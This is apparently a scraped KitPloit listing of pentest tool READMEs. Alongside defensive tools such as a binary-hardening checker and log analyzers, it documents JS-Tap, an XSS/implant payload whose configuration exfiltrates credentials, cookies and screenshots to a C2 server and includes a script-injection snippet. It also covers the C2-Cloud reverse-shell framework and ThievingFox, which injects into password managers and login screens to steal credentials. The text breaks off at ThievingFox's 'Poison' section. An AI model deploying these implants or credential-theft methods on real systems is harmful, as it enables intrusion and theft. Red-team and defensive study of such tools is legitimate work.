    • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
    • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.

    License

    The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



    KitPloit - PenTest Tools!

    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R β€” May 5th 2024 at 12:30


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and NX bit. The tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a CSV file. (For more information, see the Documentation.md file.)


    Execute Scanning Example

    Scan the '/bin/cp' file and the system hardening methods:

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following:

    1. the readelf and file commands
    2. Python 3
    3. pip
    4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation or installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan; the argument accepts more than one file, separated by spaces.

    -d --directory

    Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consist of 3 different states:

    β€’ (X) - the binary hardening mechanism is disabled.
    β€’ (V) - the binary hardening mechanism is enabled.
    β€’ (-) - the binary hardening mechanism is not relevant in this particular case.
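    The state markers can be interpreted mechanically, e.g. when consuming the CSV export. A hypothetical helper (not part of HardeningMeter) that flags the mechanisms needing attention:

    ```python
    # Hypothetical interpretation helper for HardeningMeter's three result states.
    STATE_MEANING = {
        "X": "disabled",
        "V": "enabled",
        "-": "not relevant",
    }

    def weak_mechanisms(row):
        """Return the hardening mechanisms marked disabled ('X') in a result row."""
        return [mech for mech, state in row.items() if state == "X"]

    row = {"Stack Canary": "V", "RELRO": "X", "PIE": "-"}
    print(weak_mechanisms(row))  # ['RELRO']
    ```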

    Notes

    When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



    KitPloit - PenTest Tools!

    JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

    By: Zion3R β€” May 4th 2024 at 12:30


    JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


    Changelogs

    Major changes are documented in the project Announcements:
    https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

    Demo

    You can read the original blog post about JS-Tap here:
    javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

    Short demo from ShmooCon of JS-Tap version 1:
    https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

    Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
    https://youtu.be/aWvNLJnqObQ?t=11719

    A demo can also be seen in this webinar:
    https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

    Upgrade warning

    I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

    Introduction

    JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

    The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

    Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

    The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; note, however, that any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated; prior to using it in an engagement, strongly consider renaming the endpoints, stripping comments, and heavily obfuscating the payload.

    Make sure you review the configuration section below carefully before using on a publicly exposed server.

    Data Collected

    • Client IP address, OS, Browser
    • User inputs (credentials, etc.)
    • URLs visited
    • Cookies (that don't have httponly flag set)
    • Local Storage
    • Session Storage
    • HTML code of pages visited (if feature enabled)
    • Screenshots of pages visited
    • Copy of Form Submissions
    • Copy of XHR API calls (if monkeypatch feature enabled)
      • Endpoint
      • Method (GET, POST, etc.)
      • Headers set
      • Request body and response body
    • Copy of Fetch API calls (if monkeypatch feature enabled)
      • Endpoint
      • Method (GET, POST, etc.)
      • Headers set
      • Request body and response body

    Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode, only Fetch API calls can currently be copied.

    Operating Modes

    The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

    Trap Mode

    Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload is deleted from memory and stops working. JS-Tap needs to run for a long time or you won't collect useful data.

    Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

    In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

    Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

    Note: I've had good luck using Trap Mode as a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application uses inside its authenticated section. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will be set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.

    A user refreshing the page will generally break/escape the iframe trap.

    Implant Mode

    Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

    A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

    Installation and Start

    Requires python3. A large number of dependencies are required for jsTapServer, so you are highly encouraged to use Python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

    Example:

    mkdir jsTapEnvironment
    python3 -m venv jsTapEnvironment
    source jsTapEnvironment/bin/activate
    cd jsTapEnvironment
    git clone https://github.com/hoodoer/JS-Tap
    cd JS-Tap
    pip3 install -r requirements.txt

    run in debug/single thread mode:
    python3 jsTapServer.py

    run with gunicorn multithreaded (production use):
    ./jstapRun.sh

    A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

    If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

    Note that on Mac I also had to install libmagic outside of python.

    brew install libmagic

    Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to run JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

    Configuration

    JS-Tap Server Configuration

    Debug/Single thread config

    If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

    Proxy Mode

    For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

    If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

    When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
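    The client IP selection described above can be sketched as a small function (illustrative only; the actual jsTapServer implementation may differ):

    ```python
    def client_ip(remote_addr, headers, proxy_mode):
        """Pick the client IP as described above: behind NGINX (proxy mode),
        trust X-Forwarded-For; otherwise use the socket's source address."""
        if proxy_mode:
            forwarded = headers.get("X-Forwarded-For", "")
            if forwarded:
                # X-Forwarded-For may carry a chain; the left-most entry is the client.
                return forwarded.split(",")[0].strip()
        return remote_addr

    print(client_ip("127.0.0.1", {"X-Forwarded-For": "203.0.113.7"}, proxy_mode=True))
    ```

    This is also why NGINX must be configured to set X-Forwarded-For; otherwise every client would appear to come from the proxy's address.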

    Data Directory

    The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

    Server Port

    To change the server port configuration see the last line of jsTapServer.py

    app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

    Gunicorn Production Configuration

    Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

    A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavyweight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box, you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.

    At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;
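    The "CPUs + 1" sizing heuristic mentioned above is easy to compute; a small sketch (the real values go into the jstapRun.sh variables):

    ```python
    import os

    # Sizing heuristic described above: workers = CPU count + 1,
    # plus a handful of threads per worker for this I/O-heavy application.
    num_workers = (os.cpu_count() or 1) + 1
    num_threads = 4  # 4-8 depending on how beefy the processors are
    print(num_workers, num_threads)
    ```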

    Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

    Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

    telemlib.js Configuration

    These configuration variables are in the initGlobals() function.

    JS-Tap Server Location

    You need to configure the payload with the URL of the JS-Tap server it will connect back to.

    window.taperexfilServer = "https://127.0.0.1:8444";

    Mode

    Set to either trap or implant. This is set with the variable:

    window.taperMode = "trap";
    or
    window.taperMode = "implant";

    Trap Mode Starting Page

    Only needed for trap mode. See explanation in Operating Modes section above.
    Sets the page the user starts on when the iFrame trap is set.

    window.taperstartingPage = "http://targetapp.com/somestartpage";

    If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

    window.taperstartingPage = window.location.href;

    Client Tag

    Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of which payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.

    This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.

    window.taperTag = 'whatever';

    Custom Payload Tasks

    Used to set whether clients check for Custom Payload tasks, and how often they check. The jitter settings let you optionally set a floor and ceiling modifier: a random value between these two numbers is picked and added to the check delay. Set both to 0 for no jitter.

    window.taperTaskCheck        = true;
    window.taperTaskCheckDelay = 5000;
    window.taperTaskJitterBottom = -2000;
    window.taperTaskJitterTop = 2000;
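    In effect, the next task-check delay is the base delay plus a random jitter drawn between the bottom and top modifiers. A Python sketch of that arithmetic (the payload itself implements this in JavaScript):

    ```python
    import random

    def next_task_check_delay(base=5000, jitter_bottom=-2000, jitter_top=2000):
        """Base delay plus a random jitter in [jitter_bottom, jitter_top] ms."""
        return base + random.randint(jitter_bottom, jitter_top)

    # With the settings above, checks land somewhere between 3000 and 7000 ms apart.
    print(next_task_check_delay())
    ```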

    Exfiltrate HTML

    true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

    window.taperexfilHTML = true;

    Copy Form Submissions

    true/false setting on whether to intercept a copy of all form posts.

    window.taperexfilFormSubmissions = true;

    MonkeyPatch APIs

    Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode; in implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature re-writes the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls will be captured via the XHR API, which jQuery uses under the hood for network calls.

    window.monkeyPatchAPIs = true;
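    Monkeypatching here just means replacing a function with a wrapper that records the call and then delegates to the original. The same idea expressed in Python terms (illustrative only; the actual payload patches the browser's XHR/Fetch objects in JavaScript):

    ```python
    calls = []  # captured (name, args) tuples, analogous to JS-Tap's tapped requests

    def tap(func):
        """Wrap func so every call is logged before delegating to the original."""
        def wrapper(*args, **kwargs):
            calls.append((func.__name__, args))
            return func(*args, **kwargs)
        return wrapper

    def fetch(url):           # stand-in for the browser's fetch()
        return f"response from {url}"

    fetch = tap(fetch)        # monkeypatch: rebind the name to the wrapper
    print(fetch("https://example.com/api"))
    print(calls)
    ```

    The caller still gets the original behavior; the tap only observes.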

    Screenshot after API calls

    By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

    window.postApiCallScreenshot = true;
    window.screenshotDelay = 1000;

    JS-Tap Portal

    Login with the admin credentials provided by the server script on startup.

    Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

    The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

    Each client has an 'x' button (near the star button). This allows you to delete the session for that client; if they're sending junk or useless data, you can prevent that client from submitting future data.

    When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and disable new client sessions. You can also block specific IP addresses from receiving a session here.

    Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

    The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

    Custom Payloads

    Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

    [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]
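The sample import file above can be reproduced with a few lines of Python. Only the JSON structure and the base64 encoding come from the documented format; the helper function names here are mine:

```python
import base64
import json

def encode_payload(name, code, description):
    # Build one payload entry in the JS-Tap import format:
    # the JavaScript code and description are base64 encoded.
    return {
        "code": base64.b64encode(code.encode()).decode(),
        "description": base64.b64encode(description.encode()).decode(),
        "name": name,
    }

def decode_payload(entry):
    # Recover the plain-text code and description from an entry.
    return {
        "name": entry["name"],
        "code": base64.b64decode(entry["code"]).decode(),
        "description": base64.b64decode(entry["description"]).decode(),
    }

payloads = [
    encode_payload("Payload 1", "alert('Payload 1 firing');", "The first payload"),
]
print(json.dumps(payloads))
```

Round-tripping an exported file through decode_payload is a quick way to audit what a payload actually does before importing it into the portal.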

    The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

    In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

    You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

    The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

    Tools

    A few tools are included in the tools subdirectory.

    clientSimulator.py

    A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable; set it to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data in, simulating a real client.

    numClients = 50

    You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

    apiServer = "https://127.0.0.1:8444"

    JS-Tap run using gunicorn scales quite well.
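The thread-per-client approach described above can be sketched as follows. This is a toy stand-in: the real tools/clientSimulator.py retrieves an actual session from the jsTapServer and posts loot, and its API calls are not documented here, so the per-thread work below is a placeholder:

```python
import threading

numClients = 5                        # how many simulated clients to spawn
apiServer = "https://127.0.0.1:8444"  # where the jsTapServer is running

def simulate_client(client_id, results):
    # Placeholder for: retrieve a session from apiServer, then send
    # simulated event data in a loop. Here we only record that the
    # thread ran, and which (hypothetical) client URL it would use.
    results[client_id] = f"{apiServer}/simulated-client/{client_id}"

def run_simulation():
    results = {}
    threads = [threading.Thread(target=simulate_client, args=(i, results))
               for i in range(numClients)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results
```

Each thread writes to a distinct key, so no locking is needed in this sketch; a real simulator sending HTTP requests would want a session object per thread.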

    MonkeyPatchApp

    A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

    Run with:

    python3 monkeyPatchLab.py

    By default this will start the application running on:

    https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file; this is set in the injectPayload() function in main.js:

    function injectPayload()
    {
        document.head.appendChild(Object.assign(document.createElement('script'),
            {src: 'https://127.0.0.1:8444/lib/telemlib.js', type: 'text/javascript'}));
    }

    formParser.py

An abandoned tool, but a good start on analyzing HTML for forms and parsing out their parameters. It was intended to help automatically generate JavaScript payloads targeting form posts.

    You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

    generateIntelReport.py

No longer working; it was used before JS-Tap had a web UI. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.

    Contact

    @hoodoer
    hoodoer@bitwisemunitions.dev




    MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

    By: Zion3R β€” May 3rd 2024 at 12:30


What is MasterParser?

MasterParser is a robust Digital Forensics and Incident Response tool crafted for the analysis of Linux logs within the /var/log directory. Designed to expedite the investigation of security incidents on Linux systems, MasterParser scans supported logs, such as auth.log, and extracts critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for incident responders. Beyond its immediate utility for DFIR teams, MasterParser is also valuable to the broader InfoSec and IT community, contributing to the swift and comprehensive assessment of security events on Linux platforms.
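To illustrate the kind of extraction described above, here is a minimal Python sketch of pulling successful SSH logins out of auth.log lines. MasterParser itself is a PowerShell script, and this regex is an illustrative assumption, not the tool's actual logic:

```python
import re

# Matches sshd "Accepted" lines, e.g.:
# "Jan  1 10:00:00 host sshd[123]: Accepted password for root from 10.0.0.5 port 51234 ssh2"
SSH_ACCEPTED = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)

def parse_auth_log(lines):
    # Extract successful SSH logins (auth method, user, source IP, port).
    events = []
    for line in lines:
        m = SSH_ACCEPTED.search(line)
        if m:
            events.append(m.groupdict())
    return events

sample = [
    "Jan  1 10:00:00 host sshd[123]: Accepted password for root from 10.0.0.5 port 51234 ssh2",
]
print(parse_auth_log(sample))
```

A real parser would also cover "Failed password", "Invalid user", and useradd/usermod events, which is where a summary of user creations would come from.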


    MasterParser Wallpapers

    Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

    Supported Logs Format

This is the list of supported log formats within the /var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis.

    Supported Log Formats List:
    1. auth.log

    Feature & Log Format Requests:

If you wish to propose the addition of a new feature / log format, kindly submit your request by creating an issue: Click here to create a request

How To Use?

    How To Use - Text Guide

1. From this GitHub repository, press "<> Code" and then "Download ZIP".
    2. From "MasterParser-main.zip", extract the folder "MasterParser-main" to your Desktop.
    3. Open a PowerShell terminal and navigate to the "MasterParser-main" folder.
    # How to navigate to the "MasterParser-main" folder from the PS terminal
    PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
    4. Now you can execute the tool. For example, to see the tool's command menu:
    # How to show the MasterParser menu
    PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
    5. To run the tool, put all your /var/log/* logs into the 01-Logs folder, and execute the tool like this:
    # How to run MasterParser
    PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
    6. That's it, enjoy the tool!

    How To Use - Video Guide

    https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

    MasterParser Social Media Publications

    Social Media Posts
    1. First Tool Post
    2. First Tool Story Publication By Help Net Security
    3. Second Tool Story Publication By Forensic Focus
    4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time



    C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

    By: Zion3R β€” May 2nd 2024 at 12:30


    The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

    C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

    Reverse shells support:

    1. Reverse TCP
    2. Reverse HTTP
    3. Reverse HTTPS (configure it behind an LB)
    4. Telegram C2

    Demo

    C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
    Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
    Telegram C2: https://youtu.be/WLQtF4hbCKk

    Key Features

    πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
    πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
    πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
    πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

    Tech Stack

    πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
    πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
    🌐 Nginx: Effortlessly routing traffic between web and backend systems.
    πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
    πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
    πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

    Architecture

    Application setup

    • Management port: 9000
• Reverse HTTP port: 8000
    • Reverse TCP port: 8888

    • Clone the repo

    • Optional: Update chait_id, bot_token in c2-telegram/config.yml
• Execute docker-compose up -d to start the containers. Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try again after some time.

    Credits

    Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

    License

    Distributed under the MIT License. See LICENSE for more information.

    Contact




    OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

    By: Zion3R β€” May 1st 2024 at 12:30


    Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


    Features

    1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

    2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

    3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

    4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
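The attack-detection feature above boils down to matching known signatures against each log line. The sketch below shows the general idea in Python; the patterns are illustrative assumptions, not WLA-cli.py's actual rule set:

```python
import re

# A tiny signature set for common web attacks, matched against raw
# access-log lines (URL-encoded variants included for LFI).
SIGNATURES = {
    "XSS": re.compile(r"<script|%3Cscript", re.IGNORECASE),
    "LFI": re.compile(r"\.\./|%2e%2e%2f", re.IGNORECASE),
    "RFI": re.compile(r"=(?:https?|ftp)://", re.IGNORECASE),
}

def classify(line):
    # Return the list of attack types whose signature matches the line.
    return [name for name, pattern in SIGNATURES.items() if pattern.search(line)]

print(classify("GET /index.php?page=../../etc/passwd HTTP/1.1"))
```

A production analyzer would additionally track request rates per source IP (for the rate-limit monitoring feature) and compare User-Agent strings against a scanner fingerprint list.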

    Future Features

    This project is actively developed, and future features may include:

    1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
    2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

    Installation

    The tool only requires Python 3 at the moment.

1. git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
    2. cd OSTE-Web-Log-Analyzer
    3. python3 WLA-cli.py

    Usage

After cloning the repository to your local machine, you can initiate the application by executing python3 WLA-cli.py. A simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t

Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h

    Contact

LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228




    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R β€” April 30th 2024 at 12:30


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

    The accompanying blog post can be found here


    Installation

    Linux

Rustup must be installed; follow the instructions available here: https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using:

    apt install mingw-w64

Both x86 and x86_64 Windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

After adding Mono repositories, Nuget can be installed using apt:

    apt install nuget

Finally, Python dependencies must be installed:

    pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

    Windows

Rustup must be installed; follow the instructions available here: https://rustup.rs/

Both x86 and x86_64 Windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

A .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development".

Finally, Python dependencies must be installed:

    pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).

    Targets

All modules have been tested on the following Windows versions:

    Windows Version
    Windows Server 2022
    Windows Server 2019
    Windows Server 2016
    Windows Server 2012R2
    Windows 10
    Windows 11

[!CAUTION] Modules have not been tested on other versions, and are not expected to work.

    Application Injection Method
    KeePass.exe AppDomainManager Injection
    KeePassXC.exe DLL Proxying
    LogonUI.exe (Windows Login Screen) COM Hijacking
    consent.exe (Windows UAC Popup) COM Hijacking
    mstsc.exe (Windows default RDP client) COM Hijacking
    RDCMan.exe (Sysinternals' RDP client) COM Hijacking
    MobaXTerm.exe (3rd party RDP client) COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

